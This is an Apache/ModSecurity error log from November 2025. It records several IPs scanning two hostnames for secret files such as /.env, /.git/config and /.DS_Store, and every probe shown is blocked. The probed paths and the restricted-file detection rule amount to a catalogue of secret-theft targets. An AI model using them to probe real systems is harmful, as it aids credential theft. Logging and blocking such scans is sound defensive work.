[Wed Nov 26 04:36:54.677543 2025] [:error] [pid 332767] [client 147.182.149.75:60912] [client 147.182.149.75] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSZ11rhGdSRPeld4s6tPAAAAAAQ"]
[Wed Nov 26 04:36:54.677775 2025] [:error] [pid 332767] [client 147.182.149.75:60912] [client 147.182.149.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSZ11rhGdSRPeld4s6tPAAAAAAQ"]
[Wed Nov 26 04:36:54.677950 2025] [:error] [pid 332767] [client 147.182.149.75:60912] [client 147.182.149.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSZ11rhGdSRPeld4s6tPAAAAAAQ"]
[Wed Nov 26 04:36:55.046618 2025] [:error] [pid 332946] [client 147.182.149.75:60926] [client 147.182.149.75] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSZ1142tx7zwD2JB34e1JwAAAAU"]
[Wed Nov 26 04:36:55.046852 2025] [:error] [pid 332946] [client 147.182.149.75:60926] [client 147.182.149.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSZ1142tx7zwD2JB34e1JwAAAAU"]
[Wed Nov 26 04:36:55.047007 2025] [:error] [pid 332946] [client 147.182.149.75:60926] [client 147.182.149.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSZ1142tx7zwD2JB34e1JwAAAAU"]
[Wed Nov 26 09:07:21.934014 2025] [authz_core:error] [pid 336733] [client 138.68.82.23:45740] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 26 09:07:23.259694 2025] [:error] [pid 336734] [client 138.68.82.23:45774] [client 138.68.82.23] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSa1O8VzR697olltB6JklQAAAA8"]
[Wed Nov 26 09:07:23.259954 2025] [:error] [pid 336734] [client 138.68.82.23:45774] [client 138.68.82.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSa1O8VzR697olltB6JklQAAAA8"]
[Wed Nov 26 09:07:23.260164 2025] [:error] [pid 336734] [client 138.68.82.23:45774] [client 138.68.82.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSa1O8VzR697olltB6JklQAAAA8"]
[Wed Nov 26 09:07:24.143106 2025] [:error] [pid 332763] [client 138.68.82.23:45786] [client 138.68.82.23] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSa1PNg2L5I3j1bw0Pok1wAAAAA"]
[Wed Nov 26 09:07:24.143363 2025] [:error] [pid 332763] [client 138.68.82.23:45786] [client 138.68.82.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSa1PNg2L5I3j1bw0Pok1wAAAAA"]
[Wed Nov 26 09:07:24.144150 2025] [:error] [pid 332763] [client 138.68.82.23:45786] [client 138.68.82.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSa1PNg2L5I3j1bw0Pok1wAAAAA"]
[Wed Nov 26 09:07:24.619556 2025] [:error] [pid 336731] [client 138.68.82.23:45788] [client 138.68.82.23] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSa1PFPr-5NQFmRJopW58QAAAAw"]
[Wed Nov 26 09:07:24.619895 2025] [:error] [pid 336731] [client 138.68.82.23:45788] [client 138.68.82.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSa1PFPr-5NQFmRJopW58QAAAAw"]
[Wed Nov 26 09:07:24.620119 2025] [:error] [pid 336731] [client 138.68.82.23:45788] [client 138.68.82.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSa1PFPr-5NQFmRJopW58QAAAAw"]
[Wed Nov 26 17:21:36.867960 2025] [authz_core:error] [pid 332947] [client 139.59.136.184:57244] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 26 17:21:38.294698 2025] [:error] [pid 336731] [client 139.59.136.184:50188] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aScpElPr-5NQFmRJopW6HgAAAAw"]
[Wed Nov 26 17:21:38.295011 2025] [:error] [pid 336731] [client 139.59.136.184:50188] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aScpElPr-5NQFmRJopW6HgAAAAw"]
[Wed Nov 26 17:21:38.295229 2025] [:error] [pid 336731] [client 139.59.136.184:50188] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aScpElPr-5NQFmRJopW6HgAAAAw"]
[Wed Nov 26 17:21:38.639399 2025] [:error] [pid 332765] [client 139.59.136.184:50196] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aScpEq6rD5eHUPU8N3cg1gAAAAI"]
[Wed Nov 26 17:21:38.639641 2025] [:error] [pid 332765] [client 139.59.136.184:50196] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aScpEq6rD5eHUPU8N3cg1gAAAAI"]
[Wed Nov 26 17:21:38.639808 2025] [:error] [pid 332765] [client 139.59.136.184:50196] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aScpEq6rD5eHUPU8N3cg1gAAAAI"]
[Wed Nov 26 17:21:38.917267 2025] [:error] [pid 336734] [client 139.59.136.184:50212] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aScpEsVzR697olltB6JkvgAAAA8"]
[Wed Nov 26 17:21:38.917509 2025] [:error] [pid 336734] [client 139.59.136.184:50212] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aScpEsVzR697olltB6JkvgAAAA8"]
[Wed Nov 26 17:21:38.917690 2025] [:error] [pid 336734] [client 139.59.136.184:50212] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aScpEsVzR697olltB6JkvgAAAA8"]
[Wed Nov 26 20:28:42.554611 2025] [authz_core:error] [pid 336729] [client 157.245.105.107:37328] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 26 20:28:43.989924 2025] [:error] [pid 332764] [client 157.245.105.107:37358] [client 157.245.105.107] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSdU67_di7oM_t3yyj5TFgAAAAE"]
[Wed Nov 26 20:28:43.990160 2025] [:error] [pid 332764] [client 157.245.105.107:37358] [client 157.245.105.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSdU67_di7oM_t3yyj5TFgAAAAE"]
[Wed Nov 26 20:28:43.990322 2025] [:error] [pid 332764] [client 157.245.105.107:37358] [client 157.245.105.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSdU67_di7oM_t3yyj5TFgAAAAE"]
[Wed Nov 26 20:28:44.449145 2025] [:error] [pid 336733] [client 157.245.105.107:37362] [client 157.245.105.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSdU7NFEE-YEDclto1jROwAAAA4"]
[Wed Nov 26 20:28:44.449441 2025] [:error] [pid 336733] [client 157.245.105.107:37362] [client 157.245.105.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSdU7NFEE-YEDclto1jROwAAAA4"]
[Wed Nov 26 20:28:44.449648 2025] [:error] [pid 336733] [client 157.245.105.107:37362] [client 157.245.105.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSdU7NFEE-YEDclto1jROwAAAA4"]
[Wed Nov 26 20:28:44.917964 2025] [:error] [pid 334002] [client 157.245.105.107:37368] [client 157.245.105.107] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSdU7PJt2cox8jom8lwSgAAAAAg"]
[Wed Nov 26 20:28:44.918199 2025] [:error] [pid 334002] [client 157.245.105.107:37368] [client 157.245.105.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSdU7PJt2cox8jom8lwSgAAAAAg"]
[Wed Nov 26 20:28:44.918383 2025] [:error] [pid 334002] [client 157.245.105.107:37368] [client 157.245.105.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSdU7PJt2cox8jom8lwSgAAAAAg"]
[Thu Nov 27 01:02:11.708509 2025] [:error] [pid 350837] [client 195.178.110.157:51062] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSeVA0PaLYrVvHbFrPTsRgAAAAY"]
[Thu Nov 27 01:02:11.708871 2025] [:error] [pid 350837] [client 195.178.110.157:51062] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSeVA0PaLYrVvHbFrPTsRgAAAAY"]
[Thu Nov 27 01:02:11.709151 2025] [:error] [pid 350837] [client 195.178.110.157:51062] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSeVA0PaLYrVvHbFrPTsRgAAAAY"]
[Thu Nov 27 01:03:04.979924 2025] [:error] [pid 350847] [client 195.178.110.157:41326] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aSeVOKFYQXAaYCyOv5ADdAAAAAM"]
[Thu Nov 27 01:03:04.980203 2025] [:error] [pid 350847] [client 195.178.110.157:41326] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aSeVOKFYQXAaYCyOv5ADdAAAAAM"]
[Thu Nov 27 01:03:04.980371 2025] [:error] [pid 350847] [client 195.178.110.157:41326] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aSeVOKFYQXAaYCyOv5ADdAAAAAM"]
[Thu Nov 27 01:03:16.342839 2025] [:error] [pid 350835] [client 195.178.110.157:34368] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aSeVRM3-J6_qDUnxDyQSgwAAAAE"]
